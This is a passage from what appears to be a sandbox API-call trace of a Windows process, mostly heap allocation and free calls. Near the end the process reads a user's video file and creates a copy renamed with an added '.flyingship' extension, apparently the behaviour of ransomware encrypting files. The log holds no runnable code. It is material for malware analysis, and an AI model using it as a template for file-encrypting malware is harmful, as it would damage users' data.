out: hHeap=0x8a0000) returned 1 [0193.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0193.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0193.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0193.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0193.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0193.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0193.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0193.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0193.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0193.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0193.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0193.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0193.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0193.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0193.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0193.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0193.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0193.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0193.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0193.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0193.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0193.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0193.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0193.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0193.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0193.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0193.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0193.087] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0193.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0193.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0193.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0193.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0193.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0193.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0193.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0193.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0193.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0193.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0193.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0193.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0193.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0193.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0193.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0193.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0193.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0193.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0193.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0193.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0193.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0193.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0193.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0193.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0193.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0193.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0193.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0193.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0193.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0193.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0193.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0193.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0193.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0193.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0193.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0193.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0193.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0193.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0193.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0193.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0193.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0193.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0193.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0193.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0193.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0193.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0193.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0193.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0193.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0193.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0193.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0193.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0193.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0193.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0193.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0193.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0193.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0193.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0193.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0193.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0193.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0193.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0193.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0193.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0193.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0193.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0193.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0193.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0193.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0193.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0193.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0193.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0193.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0193.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0193.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0193.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0193.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0193.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0193.091] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0193.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0193.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0193.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0193.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0193.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0193.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0193.091] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0193.091] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae58 | out: hHeap=0x8a0000) returned 1 [0193.091] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0193.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0193.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0193.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0193.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0193.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0193.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0193.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0193.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0193.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae58 [0193.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbca008 [0193.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0193.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0193.092] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\sw3Tjl.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ffd495b2eqp\\sw3tjl.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0193.093] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.093] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0193.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0193.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0193.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0193.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0193.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0193.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0193.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0193.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0193.094] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0193.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0193.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0193.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0193.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0193.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0193.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0193.094] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0193.094] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0193.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0193.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0193.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0193.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0193.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0193.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0193.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0193.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0193.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0193.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0193.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0193.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0193.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0193.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0193.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0193.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0193.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0193.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0193.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0193.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0193.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0193.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0193.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0193.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0193.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0193.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0193.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0193.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0193.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0193.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5de0 [0193.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0193.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d10 [0193.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0193.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0193.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0193.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0193.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0193.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0193.097] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\sw3Tjl.flyingship.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ffd495b2eqp\\sw3tjl.flyingship.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0193.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0193.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0193.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0193.100] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0193.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0193.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0193.100] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.100] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0193.100] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0193.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0193.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0193.100] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0193.100] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0193.100] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x6ccb, lpOverlapped=0x0) returned 1 [0193.103] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0193.103] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0193.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0193.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 